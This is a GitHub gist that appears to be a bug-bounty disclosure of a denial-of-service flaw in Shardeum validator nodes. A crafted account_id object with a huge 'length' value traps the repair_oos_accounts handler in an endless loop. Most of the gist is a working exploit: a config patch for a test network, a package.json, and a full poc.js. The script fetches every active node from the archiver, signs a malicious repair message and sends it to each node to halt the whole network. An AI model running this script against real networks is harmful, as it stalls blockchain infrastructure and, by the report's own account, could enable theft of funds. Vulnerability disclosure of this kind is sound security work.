Skip to content

Instantly share code, notes, and snippets.

@Slonser

Slonser/desc.md Secret

Last active August 3, 2024 23:33
Show Gist options
  • Save Slonser/3434c9d6f30b598da84e0746438e27fb to your computer and use it in GitHub Desktop.
Save Slonser/3434c9d6f30b598da84e0746438e27fb to your computer and use it in GitHub Desktop.
Improper input validation in repair_oos_accounts

Brief/Intro

Shardeum validator nodes implemented in the https://github.com/shardeum/shardeum repository are vulnerable to complete DOS due to lack of input validation in repair_oos_accounts (https://github.com/shardeum/shardus-core/blob/4d75f797a9d67af7a94dec8860220c4e0f9ade3c/src/state-manager/AccountPatcher.ts#L336) and repairMissingAccountsBinary (https://github.com/shardeum/shardus-core/blob/4d75f797a9d67af7a94dec8860220c4e0f9ade3c/src/state-manager/AccountPatcher.ts#L489) internal endpoints. Exploitation leads to a complete stall of all of the active validator node's processes, and due to the simplicity of the exploit, it is possible to execute it on all active nodes. A more sophisticated attack would involve shutting down only a large part of the nodes, but not all, for attacker-controlled nodes to be the only ones available, which can then be used to overtake the whole network.

Vulnerability Details

In repairMissingAccountsBinary and repair_oos_accounts handlers, there is a loop that iterates up to receivedBestVote.account_id.length https://github.com/shardeum/shardus-core/blob/4d75f797a9d67af7a94dec8860220c4e0f9ade3c/src/state-manager/AccountPatcher.ts#L413

for (let i = 0; i < receivedBestVote.account_id.length; i++) {
  if (receivedBestVote.account_id[i] === accountID) {
    if (receivedBestVote.account_state_hash_after[i] !== calculatedAccountHash) {
      nestedCountersInstance.countEvent('accountPatcher', `repair_oos_accounts: account hash mismatch for txId: ${txId}`)
      accountHashMatch = false
    } else {
      accountHashMatch = true
    }
       break
    }
}

The issue arises from the fact that receivedBestVote is a request parameter and is not validated to be an array, which allows an attacker to pass the following object as part of the request data:

"appliedVote":sign({
  "node_id":NODE_ID,
  "transaction_result":"result",
  "account_id":{
    length: 10000000000000000000000000000000000000000000
  }
})

This will cause NodeJS to go into an infinite loop because the value 10000000000000000000000000000000000000000000 is greater than Number.MAX_SAFE_INTEGER. Due to how NodeJS works, this will block the process' event loop thread, and no other logic will be able to run, practically shutting the validator node down and making it simply infinitely waste CPU cycles.

Impact Details

The most basic outcome would be a total network shutdown caused by exploiting the DOS vulnerability on each active validator node. Since exploitation does not cause the nodes' processes to actually shut down or crash, the whole network will just stop processing any requests and user transactions. So that actually starting the network back up would require a fix to be deployed to all nodes, making it more difficult to mitigate.

A more complex attack scenario, as said in the intro, would be the shutdown of nearly all, but not all, validator nodes, so that attackers nodes would be the only ones left available. Which would leave the whole network to be controlled by the attacker. This means the network will continue functioning, but the attacker will be able to execute any transaction they want, and drain all the funds to themselves.

References

JavaScript max and min safe-to-use number values: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/MAX_SAFE_INTEGER, https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/MIN_SAFE_INTEGER

diff --git a/src/config/genesis.json b/src/config/genesis.json
index 1d7df74..459da21 100644
--- a/src/config/genesis.json
+++ b/src/config/genesis.json
@@ -521,5 +521,8 @@
},
"0xe33BF2d6b28c6aC880cd81b5564A92a42593369d": {
"wei": "10000001000000000000000000"
+ },
+ "0xe6e789891Aad9E4ea1e0E37214Bd7067598BAdEc": {
+ "wei": "100000000000000000000"
}
}
diff --git a/src/config/index.ts b/src/config/index.ts
index 665bb88..0970b18 100644
--- a/src/config/index.ts
+++ b/src/config/index.ts
@@ -132,8 +132,8 @@ config = merge(config, {
p2p: {
cycleDuration: 60,
minNodesToAllowTxs: 1, // to allow single node networks
- baselineNodes: process.env.baselineNodes ? parseInt(process.env.baselineNodes) : 300, // config used for baseline for entering recovery, restore, and safety. Should be equivalient to minNodes on network startup
- minNodes: process.env.minNodes ? parseInt(process.env.minNodes) : 300,
+ baselineNodes: process.env.baselineNodes ? parseInt(process.env.baselineNodes) : 32, // config used for baseline for entering recovery, restore, and safety. Should be equivalient to minNodes on network startup
+ minNodes: process.env.minNodes ? parseInt(process.env.minNodes) : 32,
maxNodes: process.env.maxNodes ? parseInt(process.env.maxNodes) : 1100,
maxJoinedPerCycle: 10,
maxSyncingPerCycle: 10,
@@ -146,7 +146,7 @@ config = merge(config, {
amountToShrink: 5,
maxDesiredMultiplier: 1.2,
maxScaleReqs: 250, // todo: this will become a variable config but this should work for a 500 node demo
- forceBogonFilteringOn: true,
+ forceBogonFilteringOn: false,
//these are new feature in 1.3.0, we can make them default:true in shardus-core later
// 1.2.3 migration starts
@@ -309,8 +309,8 @@ config = merge(
mode: 'release', // todo: must set this to "release" for public networks or get security on endpoints. use "debug"
// for easier debugging
debug: {
- startInFatalsLogMode: true, // true setting good for big aws test with nodes joining under stress.
- startInErrorLogMode: false,
+ startInFatalsLogMode: false, // true setting good for big aws test with nodes joining under stress.
+ startInErrorLogMode: true,
robustQueryDebug: false,
fakeNetworkDelay: 0,
disableSnapshots: true, // do not check in if set to false
{
"name": "dos",
"author": "neplox",
"type": "module",
"dependencies": {
"@shardus/crypto-utils": "^4.1.3",
"@shardus/net": "^1.3.15",
"@shardus/types": "^1.2.14",
"axios": "^1.7.2",
"ethers": "^6.13.1"
}
}
import * as net from "@shardus/net";
import axios from "axios";
import {Utils} from '@shardus/types'
import * as crypto from '@shardus/crypto-utils'
import {ethers} from 'ethers';
// Default archiver node address when using the shardus tool.
const ARCHIVER_URL = "http://127.0.0.1:4000";
// Default URL used by https://github.com/shardeum/json-rpc-server for a local setup.
const JSON_RPC_URL = "http://127.0.0.1:8080";
// Attacker account details.
// This public key is added to genesis.json with 100 SHM coins.
const ATTACKER_ACCOUNT = {
address: "0xe6e789891Aad9E4ea1e0E37214Bd7067598BAdEc",
privateKey:
"0x620a76f869092278b2fc8cff07fa2458f6240c81e93bee80e0b7c69751d6c661",
};
// Your node keypair and NODE_ID
const keypair = {"publicKey":"f8b0912b45c3c2c3b5157cd4f27e0af23bf4cb3d209838d96690a55660a6b9a6","secretKey":"2d822469f9a05a1db81e70a94f0c57007939d5a8cde2562bd60cb89f9aafa579f8b0912b45c3c2c3b5157cd4f27e0af23bf4cb3d209838d96690a55660a6b9a6"}
const NODE_ID = "b4f94a5bfb91ed0f7ef1d4ee9bd622fa74a1769e278ba5fde9021673c74771e9"
const HASH_KEY = "69fa4195670576c0160d660c3be36556ff8d504725be8a59b5a96509e0c994bc"
crypto.init(HASH_KEY)
// Step 1.
// Retrieve all kinds of nodes from the archiver by requesting each list separately.
const nodelistCalls = [
"/full-nodelist?activeOnly=true"
];
async function fetchExternalNodeAddrs() {
const nodeAddrs = [];
for (const call of nodelistCalls) {
const url = `${ARCHIVER_URL}${call}`;
try {
const response = await axios.get(url);
const nodes = response.data.nodeList;
for (let node of nodes) {
nodeAddrs.push({
ip: node.ip,
externalPort: node.port,
id: node.id
});
}
console.log(`Retrieved ${nodes.length} nodes from ${url}`);
} catch (error) {
console.log(`Failed to retrieve nodelist ${url}: ${error.message}`);
}
}
console.log(`Retrieved total ${nodeAddrs.length} external node addresses`);
return nodeAddrs;
}
// Step 2.
// Retrieve internal address information from each node in order to access the internal protocol.
async function fetchInternalNodeAddrs(nodeAddrs) {
for (let nodeAddr of nodeAddrs) {
const host = `${nodeAddr.ip}:${nodeAddr.externalPort}`;
try {
const response = await axios.get(`http://${host}/nodeinfo`);
nodeAddr.internalIp = response.data.nodeInfo.internalIp;
nodeAddr.internalPort = response.data.nodeInfo.internalPort;
} catch (error) {
console.log(`Failed to retrieve internal address for node ${host}`);
}
}
console.log(`Retrieved internal endpoint addresses for nodes`);
}
// Default opts used by Shardeum, don't actually matter for exploit.
const sn = net.Sn({
port: 1337,
senderOpts: {
useLruCache: true,
lruSize: 1000,
},
headerOpts: {
sendHeaderVersion: 1,
},
crypto: {
hashKey: "69fa4195670576c0160d660c3be36556ff8d504725be8a59b5a96509e0c994bc",
// Extracted from a local node, doesn't actually matter.
signingSecretKeyHex:
"61b8e6b087b03bf945e66ae58d029a9a934f829a6316e03d58c463e155c4c0fb6292263d62054d2dc7cc372e78367d6b3656fd164a71bd585e38bf603e382aed",
},
});
//Step 3.
// generate txId
async function getTxId (nodeAddr) {
const provider = new ethers.JsonRpcProvider(JSON_RPC_URL);
const wallet = new ethers.Wallet(ATTACKER_ACCOUNT.privateKey, provider);
const balance = await wallet.provider.getBalance(wallet.address);
console.log(
`Attacker's (${wallet.address}) balance: ${ethers.formatEther(balance)}`
);
if (balance < -1) {
throw new Error(
`Attacker's (${wallet.address}) balance (${balance}) is less than the stake (${stakeAmount}).`
);
}
const [feeData, nonce] = await Promise.all([
wallet.provider.getFeeData(),
wallet.provider.getTransactionCount(wallet.address),
]);
const stakeData = {
isInternalTx: true,
internalTXType: 4, // InternalTXType.ApplyChangeConfig
change: {
cycle: 1,
change: {
mode: "debug",
},
},
}
const tx = await wallet.sendTransaction({
from: wallet.address,
to: "0x0000000000000000000000000000000000010000",
gasPrice: feeData.gasPrice,
gasLimit: 30000000,
value: 1,
data: ethers.hexlify(ethers.toUtf8Bytes(JSON.stringify(stakeData))),
nonce,
});
console.log(tx);
while(true){
sleep(10000);
var res = await axios.get(`http://${nodeAddr.ip}:${nodeAddr.externalPort}/tx/${tx.hash}`)
if(res.data.account != null){
console.log(`Got txID ${res.data.account.txId}`);
return res.data.account.txId;
}
}
}
// Step 4.
// Send malicious message via internal protocol using @shardus/net which will be parsed using Utils.safeJsonParse.
async function exploit(nodeAddr, txId) {
const payload = {
"accountID": "0000000000000000000000000000000000000000",
"txId": txId,
"hash":"1231231231231231231231231",
"accountData":{
"data":{
"accountType":6,
"account":{
"storageRoot":{
"data":{
"length": 16
}
},
"codeHash":{
"data":{
"length": 16
}
}
}
}
},
"targetNodeId": nodeAddr.id,
"receipt2":{
"appliedVote":sign({
"node_id":NODE_ID,
"transaction_result":"result",
"account_id":{
length: 10000000000000000000000000000000000000000000
}
})
}
}
let opt = {
"ADDRESS": "127.0.0.1",
"PORT": "10002",
"UUID": "35f6ed5a-b4ab-4974-9223-242b6e832681",
"payload": _wrapAndSignMessage({
"repairInstructions":[payload]
}),
"route":"repair_oos_accounts",
"msgDir":"ask",
"receivedTime":0,
"replyReceivedTime": 0,
"replyTime": 0,
"sendTime": Date.now(),
"timeout":5000
}
console.log(
`Executing DOS on node ${nodeAddr.ip}:${nodeAddr.externalPort} by sending message to internal ${nodeAddr.internalIp}:${nodeAddr.internalPort}`
);
await sn.send(
nodeAddr.internalPort,
nodeAddr.internalIp,
opt,
1000,
(e) => {console.log(e)},
(e) => {console.log(e)}
);
}
function sleep(ms) {
return new Promise(resolve => setTimeout(resolve, ms));
}
async function main() {
let nodeAddrs = await fetchExternalNodeAddrs();
await fetchInternalNodeAddrs(nodeAddrs);
const txId = await getTxId(nodeAddrs[0]);
for (let nodeAddr of nodeAddrs) {
exploit(nodeAddr, txId);
}
}
main();
function _wrapMessage(msg, tracker = '') {
if (!msg) throw new Error('No message given to wrap and tag!')
return {
payload: msg,
sender: NODE_ID,
tracker,
msgSize: 0,
}
}
function sign(obj){
const objCopy = Utils.safeJsonParse(Utils.safeStringify(obj))
crypto.signObj(objCopy, keypair.secretKey, keypair.publicKey)
return objCopy
}
function signWithSize(obj) {
const wrappedMsgStr = Utils.safeStringify(obj)
const msgLength = wrappedMsgStr.length
obj.msgSize = msgLength
return sign(obj)
}
function _wrapAndSignMessage(msg, tracker = '') {
const wrapped = _wrapMessage(msg, tracker)
return signWithSize(wrapped)
}

Proof of concept

This POC was written in order to demonstrate total network shutdown as the main impact, as fund loss would be an impact that would follow due to all validator nodes except the attacker's being crippled. In order to simplify the POC only the main impact of validator node DOS is implemented.

poc.js contained in the attached gist contains the main exploit code for automatically disabling all the active nodes of the network after retrieving their addresses from the archiver. This writeup is present just to showcase exactly how it was tested and how it works.

Local Shardeum network setup

This vulnerability is equally exploitable with any number of nodes as exploitation of a single validator node requires sending just a single message via the internal protocol. For demonstration purposes, however, a network with only 32 validator nodes is created.

Any Shardeum network using the current validator node code will be vulnerable, so it is not necessary to follow these exact steps. They are here just to showcase how the POC was tested by me.

  1. Clone the Shardeum repo and switch to the last commit on the dev branch, which is c7b10c2370028f7c7cbd2a01839e50eb50faa904 as of this POC's submission.

    git clone https://github.com/shardeum/shardeum.git
    cd shardeum
    git switch --detach c7b10c2370028f7c7cbd2a01839e50eb50faa904
  2. Switch to NodeJS 18.16.1, which is the version used by Shardeum in dev.Dockerfile and its various library requirements. For example, using asdf (https://asdf-vm.com/):

    asdf install nodejs 18.16.1
    asdf local nodejs 18.16.1
  3. Apply the network-32.patch file from the attached gist for network setup. Note that it DOES NOT enable debug mode, demonstrating the vulnerability in a semi-realistic release setup.

    git apply network-32.patch
  4. Install dependencies and build the project.

    npm ci
    npm run prepare
  5. Launch the network with 32 nodes as specified in the patch using the shardus tool.

    npx shardus create 32

After this step, 15-20 minutes are required as usual for at least some validator nodes to go into being active, at which point the exploit itself can be ran. I used the http://localhost:3000/ monitor to wait for nodes to start activating.

JSON-RPC API setup

To simplify the POC, Shardeum's json-rpc-server is used to interact with the network, specifically, to send a single stake transaction using the attacker's account, to use its ID later with the repair_oos_accounts endpoint.

  1. Clone the json-rpc-server repo and switch to the last commit on the dev branch, which is c3c462a4b18bc7517e086ff70f08ae6afede3b31 as of this POC's submission.

    git clone https://github.com/shardeum/json-rpc-server.git
    cd json-rpc-server
    git switch --detach c3c462a4b18bc7517e086ff70f08ae6afede3b31
  2. Switch to NodeJS 18.16.1, which is the version used by json-rpc-server in Dockerfile and its various library requirements. For example, using asdf (https://asdf-vm.com/):

    asdf install nodejs 18.16.1
    asdf local nodejs 18.16.1
  3. Install dependencies.

    npm install
  4. Launch the JSON RPC server. This must be done once the Shardeum network is at least partially active, for the server to receive and be able to interact with valid archiver and validator nodes.

    npm run start

DOS exploitation for network shutdown

As said in the introduction, poc.js from the attached gist contains the exploit code and can be ran on any network as long as a valid archiver URL and Attacker validator node info is suplied It can be ran using NodeJS, requires a few of the Shardus packages (@shardus/crypto-utils, @shardus/net, @shardus/types) as well as ether and axios libraries to be installed, as specified in the attached package.json. Following is a detailed writeup of how it works:

NOTE: modify the keypair and NODE_ID variables with the values of one of the nodes in the network, for the POC to simulate requests from an attacker-controlled validator node. The keypair should be set to the contents of a node's secrets.json, and NODE_ID can be set to the value of id retrieved from a node's /nodeinfo endpoint.

  1. A request to the specified archiver's full-nodelist endpoint is made in order to retrive the full list of validator active nodes in the network. Running the DOS on these nodes means that no more nodes will be available, leading to a total shutdown of the network.

  2. Each node's /nodeinfo endpoint is queried to retrieve the internalIp, internalPort and id values

  3. Using getTxId, we create a new transaction (it doesn't matter if it succeeds or not). This is done to obtain a txId that will be used in the future.

  4. A message with payload of the form

       repairInstructions:[{
       "accountID": "0000000000000000000000000000000000000000",
       "txId": txId,
       "hash":"1231231231231231231231231",
       "accountData":{
         "data":{
             "accountType":6,
             "account":{
                 "storageRoot":{
                     "data":{
                         "length": 16
                     }
                 },
                 "codeHash":{
                     "data":{
                         "length": 16
                     }
                 }
             }
         }
      },
       "targetNodeId": nodeAddr.id,
       "receipt2":{
         "appliedVote":sign({
             "node_id":NODE_ID,
             "transaction_result":"result",
             "account_id":{
               length: 10000000000000000000000000000000000000000000
             }
         })
       }
     }]
    

    is sent using the internal protocol to repair_oos_accounts handler triggering the vulnerability. Inifinite for loop execution will then block NodeJS' event loop, making each active validator node unresponsive and practically stopping the network.

Shardeum's monitor dashboard, launched by default on http://localhost:3000/ can be used to check that all active nodes will be now marked as red as they go offline and stop reporting to the monitor. Making any request to the validator nodes will hang, as the network is completely stopped at this point.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment